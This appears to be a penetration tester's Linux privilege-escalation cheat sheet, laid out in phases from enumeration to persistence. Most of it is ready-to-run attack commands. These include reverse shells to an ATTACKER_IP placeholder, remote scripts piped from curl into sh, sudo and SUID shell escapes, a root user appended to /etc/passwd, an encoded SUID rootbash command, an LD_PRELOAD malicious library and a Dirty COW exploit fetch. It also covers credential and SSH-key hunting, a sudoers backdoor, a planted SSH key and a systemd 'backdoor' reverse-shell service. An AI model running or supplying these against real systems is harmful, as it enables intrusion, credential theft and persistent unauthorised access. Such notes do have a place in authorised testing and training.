Linux Privilege Escalation

Nested Shell Strategy

Always create backup shells immediately after initial access

1. Get initial shell via web exploit
2. Immediately create second shell via different method
3. Upgrade shells and maintain multiple access points

echo 'bash -i >& /dev/tcp/ATTACKER_IP/5678 0>&1'

Upgrade nested shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'; export TERM=xterm
(Ctrl-Z)
stty raw -echo; fg

Phase 1: System Information Gathering

Basic System Info

# System details
uname -a
cat /etc/os-release
cat /etc/issue
ip a
hostname
whoami
id

# Current user info
groups
cat /etc/passwd | grep -E "(sh|bash)$"
cat /etc/group
sudo -l

Running Processes & Services

ps aux
ps -ef
systemctl list-units --type=service --state=running
netstat -tulpn
ss -tulpn

Process Monitoring with pspy

# Download and run pspy to monitor background processes
wget https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64
chmod +x pspy64
./pspy64

# Look for:
# - Cron jobs running as root
# - Scripts with writable paths
# - Processes running with elevated privileges
# - File operations you can intercept

Phase 2: Automated Enumeration

LinPEAS (Primary Tool)

# Transfer and run LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Or download and run locally
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

LinEnum (Alternative)

curl -L https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh

Linux Exploit Suggester

curl -L https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | sh

Phase 3: Manual Enumeration

SUID/SGID Binaries

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

# Find SGID binaries  
find / -perm -2000 -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

# Find files with capabilities
getcap -r / 2>/dev/null

World-Writable Files & Directories

# World-writable files
find / -perm -2 -type f 2>/dev/null
find / -writable -type f 2>/dev/null

# World-writable directories
find / -perm -2 -type d 2>/dev/null
find / -writable -type d 2>/dev/null

Cron Jobs & Scheduled Tasks

# System cron jobs
cat /etc/crontab
ls -la /etc/cron*
cat /etc/cron.d/*
cat /var/spool/cron/crontabs/*

# User cron jobs
crontab -l
crontab -u root -l

# Systemd timers
systemctl list-timers

Environment Variables & PATH

echo $PATH
env
cat /etc/environment
cat /etc/profile
cat ~/.bashrc
cat ~/.profile

Phase 4: Common Privilege Escalation Vectors

Sudo Misconfigurations

sudo -l

Common sudo misconfigurations to exploit:

• sudo su or sudo bash
• NOPASSWD entries
• Wildcards in commands
• Environment variable preservation

GTFOBins Sudo Exploits

Check GTFOBins for sudo-enabled binaries:

# Examples:
sudo vi -c ':!/bin/sh' /dev/null
sudo awk 'BEGIN {system("/bin/sh")}'
sudo find . -exec /bin/sh \; -quit
sudo nmap --interactive

SUID Binary Exploitation

Common SUID Binaries to Check

# Check for unusual SUID binaries
ls -la /usr/bin/ | grep "^-rws"
ls -la /bin/ | grep "^-rws"
ls -la /usr/local/bin/ | grep "^-rws"

GTFOBins SUID Exploits

# Examples:
/usr/bin/cp /etc/passwd /tmp/passwd
echo 'user:$1$user$8m8D7FCn2M.FJh7CKDm5J/:0:0::/root:/bin/bash' >> /tmp/passwd
/usr/bin/cp /tmp/passwd /etc/passwd

# Base64 SUID example
echo "cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash" | base64
/usr/bin/base64 -d <<< "Y3AgL2Jpbi9iYXNoIC90bXAvcm9vdGJhc2g7IGNobW9kICtzIC90bXAvcm9vdGJhc2gK" | sh

Capabilities Exploitation

# If python has cap_setuid
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# If tar has cap_dac_read_search
tar -czf archive.tar.gz /etc/shadow

Path Hijacking

# If PATH includes current directory or writable directory
echo '/bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH

Library Hijacking (LD_PRELOAD)

# Check for LD_PRELOAD in sudo
sudo -l | grep LD_PRELOAD

# Create malicious library
cat > /tmp/shell.c << EOF
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
EOF

gcc -fPIC -shared -o /tmp/shell.so /tmp/shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so apache2

Phase 5: Credential Hunting

Configuration Files

# Database configs
find / -name "*.conf" -o -name "*.config" -o -name "*.cfg" 2>/dev/null | grep -E "(database|db|mysql|postgres|mongo)"

# Web application configs
find /var/www -name "*.php" -o -name "*.config" -o -name "*.ini" 2>/dev/null
grep -r "password\|passwd\|pwd" /var/www/ 2>/dev/null

History Files

cat ~/.bash_history
cat ~/.mysql_history
cat ~/.nano_history
find /home -name ".*history" 2>/dev/null

SSH Keys

find / -name "id_rsa" -o -name "id_dsa" -o -name "id_ecdsa" -o -name "id_ed25519" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null

Phase 6: Kernel Exploits

Kernel Version Check

uname -r
cat /proc/version
lsb_release -a

Common Kernel Exploits

• CVE-2021-4034 (PwnKit) - pkexec vulnerability
• CVE-2021-3156 (Baron Samedit) - sudo vulnerability
• CVE-2017-16995 - eBPF verifier
• CVE-2016-5195 (Dirty COW) - race condition in memory subsystem

Dirty COW Exploit

# Only if system is vulnerable
curl -o dirty.c https://www.exploit-db.com/download/40611
gcc -pthread dirty.c -o dirty -lcrypt
./dirty

Phase 7: Service Exploitation

Docker Privilege Escalation

# If user is in docker group
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# Or mount host filesystem
docker run --rm -v /etc:/mnt/etc -it alpine vi /mnt/etc/passwd

Database Services

# MySQL running as root
mysql -u root -p
\! /bin/bash

# Check for MySQL UDF
searchsploit mysql udf

Web Services

# Apache/Nginx running as root (rare but possible)
ps aux | grep -E "(apache|nginx|httpd)" | grep root

Phase 8: Persistence & Post-Exploitation

Add User to Sudoers

echo "user ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

Add SSH Key

mkdir -p /root/.ssh
echo "your_public_key" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
chmod 700 /root/.ssh

Backdoor Service

# Create systemd service
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=Backdoor Service

[Service]
Type=simple
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
Restart=always

[Install]
WantedBy=multi-user.target
EOF

systemctl enable backdoor.service
systemctl start backdoor.service

Common Files to Check

Sensitive Files

/etc/passwd
/etc/shadow
/etc/group
/etc/sudoers
/etc/crontab
/var/log/auth.log
/var/log/secure
/home/*/.ssh/
/root/.ssh/

Application Configs

/var/www/html/config.php
/etc/apache2/sites-enabled/
/etc/nginx/sites-enabled/
/opt/*/config/
/usr/local/*/config/

Tools & Resources

Download Tools

# Essential enumeration tools
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
wget https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64
curl -L https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Reference Sites

• GTFOBins - SUID/Sudo exploitation
• HackTricks Linux PrivEsc
• PayloadsAllTheThings
• Linux Exploit Suggester
• OSCP Secret Sauce - eins.li - pspy process monitoring

Next Steps

1. Run automated tools first (LinPEAS)
2. Follow up on findings with manual verification
3. Test identified vectors systematically
4. Document successful methods for reporting